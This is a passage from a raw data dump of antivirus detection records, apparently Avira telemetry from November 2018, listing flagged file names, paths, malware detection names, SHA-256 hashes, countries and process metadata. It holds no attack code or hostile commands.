  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:44:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082644-7e8a28f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-082615-784E182D\\AVSCAN-20181102-082644-7E8A28F0', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:29:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0000365.exe', filepath='f:\\system volume information\\_restore{08e78a57-b499-42bf-841b-9e69d7dbcbbf}\\rp1\\A0000365.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='d09530b86f4debfe425f40d70277171faf390c5066c53c330fcc96f1950cbdda', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:10:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='F:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d6cf7bbffdb8c4385f9b37e103d662945df3270f211c4510fd378400863c24e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D6CF7BBFFDB8C4385F9B37E103D662945DF3270F211C4510FD378400863C24E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8d6cf7bbffdb8c4385f9b37e103d662945df3270f211c4510fd378400863c24e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:17:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobe.acrobat.pro.dc.v2018.009.20050.exe', filepath='/Volumes/Schaareman/Adobe Acrobat Pro DC 2018.009.20050 + Pre-Cracked - [CrackzSoft]/Adobe.Acrobat.Pro.DC.v2018.009.20050.exe', filesize=0, name='HEUR/AGEN.1000773.#M15.#R1000773'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='NL', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:30:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=6000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='df3aed415215bdf4e35664a5fd9c6425f6bca7eece7fbf3701cacda8b088e40b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T13:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vthermo.exe', filepath='E:\\ThermoSolver\\vThermo.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3807'), hash='d0b72536881ee4359e1946cbf259fa30fbd15979598666dada267ea7c457cf50', metadata=Row(cmdline='rtp', country='MG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-02T10:37:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:28:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered redol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered redol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a3cd24b89528caefdeb3fb22f11c6fc4c47deeb2c9cf2812b59294bd122c625c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:39:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='googleupdatehelper.dll', filepath='C:\\Program Files (x86)\\Google\\Chrome\\Application\\GoogleUpdateHelper.dll', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='afea9fe4ef82ead046abf2687469a15fcaf234e7856e9520ee8115325295e6ac', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered redol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered redol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a3cd24b89528caefdeb3fb22f11c6fc4c47deeb2c9cf2812b59294bd122c625c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-203202-0bb5e30b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203202-0BB5E30B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:32:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='thunderbird setup 52.1.1 indo.exe', filepath='G:\\BACKUP-DATA-SINTA\\DATA TGL 4 NOVEMBER 2018\\Thunderbird Setup 52.1.1 Indo.exe', filesize=100000, name='W32/Sality.#M1.#R1'), hash='cdfecd65cb5960286a2e48d02cf59e7472b27b14bbbc9e4bb2bdca3ddb079634', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:26:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:02:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205320-b65d8092', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205320-B65D8092', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='c11ef2e3839d2c5ac03b9446d7f3d04ae70c729b90f76c2016186d6f6eb807ad', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T06:27:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ecc5', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ecc5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:07:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291485', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291485', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:49:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093651-149dacd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7b4870a\\AVSCAN-20181104-093636-11E94D4E\\AVSCAN-20181104-093651-149DACD0', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:38:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e779', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e779', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:01:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111057-a7402b34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-111044-A61821D0\\AVSCAN-20181104-111057-A7402B34', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl1a8.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl1A8.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132815-ba20a849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95424404\\AVSCAN-20181104-132731-B32E5896\\AVSCAN-20181104-132815-BA20A849', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:28:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='beforeghost.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\BeforeGhost.exe', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152207-59762067', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-152207-59762067', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:22:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153102-0155d25b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57d0b187\\AVSCAN-20181104-153026-FA27B27A\\AVSCAN-20181104-153102-0155D25B', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:31:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M0.#R0'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:59:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\MSOCache\\All Users\\{90140000-006E-0416-0000-0000000FF1CE}-C\\dwtrig20.exe', filesize=644000, name='W32/Neshta.A.#M1.#R1'), hash='f8d1aad24dd3f8c7b079c7c98dba57ae56a5562860b6a5f3e1aaa6113b0ebfbe', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\PROGRA~2\\\\\\\\Avira\\\\\\\\Launcher\\\\\\\\AVIRAS~2.EXE\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-01T16:44:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Users\\X\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:08:04Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='starting_the_game.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Starting_the_Game\\Starting_the_Game.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160055-f3429f90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160055-F3429F90', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mot.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\MOT\\MOT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='5ac3e3d417e155cdf1927e3f872654ae40655b0ebf8fb8901a9f01ce0fc3617f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T05:20:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fifa 16 downloader.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.672\\FIFA 16 Downloader.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2a96eb3f66e560f54156019867451774c2994752badd1f8520ec29d949187b45', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\FIFA 16 Downloader\\\\\\\\FIFA 16 Downloader.zip\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1463288, timestamp='2018-11-02T14:58:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T05:28:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wax6bca.tmp', filepath='\\\\?\\C:\\Windows\\Temp\\WAX6BCA.tmp', filesize=23552000, name='HEUR/AGEN.1014216.#M1.#R1'), hash='669655ce9033305dfb34eefd77f86328f856d6530ebbfddaa7c1fc9939f12d38', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0214382.exe', filepath='H:\\System Volume Information\\_restore{1A756976-7FD6-45DE-97F9-50E788C09282}\\RP878\\A0214382.exe', filesize=9644000, name='W32/Parite.#M1.#R1'), hash='10818c2682104d33af3922322b9ca88578cc2cc091d738ca0bf8eaf5b5ae5411', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:22:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T05:05:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:57:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='management.pif', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\jre\\lib\\management\\management.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2581403\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-02T20:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040532-ce5a781e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-040532-CE5A781E', filesize=640000, name='X97M/Escop.SJ.#M1.#R1'), hash='4245159132041e5c13593d7ecadda6c1986f7b6354552e5e71bbcc64a01359ce', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chickeninvaders2xmasdemo.exe', filepath='j:\\العاب\\games  000\\العاب جديده\\chickeninvaders 3\\ChickenInvaders2Xmasdemo.exe', filesize=640000, name='W32/Neshta.A.#M1.#R1'), hash='0ef29dbd50fea0bf6885abdf69f78748b9ac31cabb276e6f8e6e67f89de598ec', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ae-ef03-e-psp2$项目进度计划(软件修订记录).xls', filepath='C:\\Users\\X\\Desktop\\AE-EF03-E-PSP2$项目进度计划(软件修订记录).xls', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='1899d4d9c91fcb27d40e5323532cda1136d9eb1526a5e0591d4ba733d9f3b624', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\AE-EF03-E-PSP2$项目进度计划(软件修订记录).xls\\\\\\"', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Notepad++\\notepad++.exe', parentsize=2468016, timestamp='2018-11-02T06:29:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T05:44:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0155595.dll', filepath='g:\\system volume information\\_restore{98857453-17a4-42b1-8085-e71e507860ed}\\rp82\\A0155595.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:53:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T06:03:59Z'), dt=datetime.date(2018, 11, 2)),
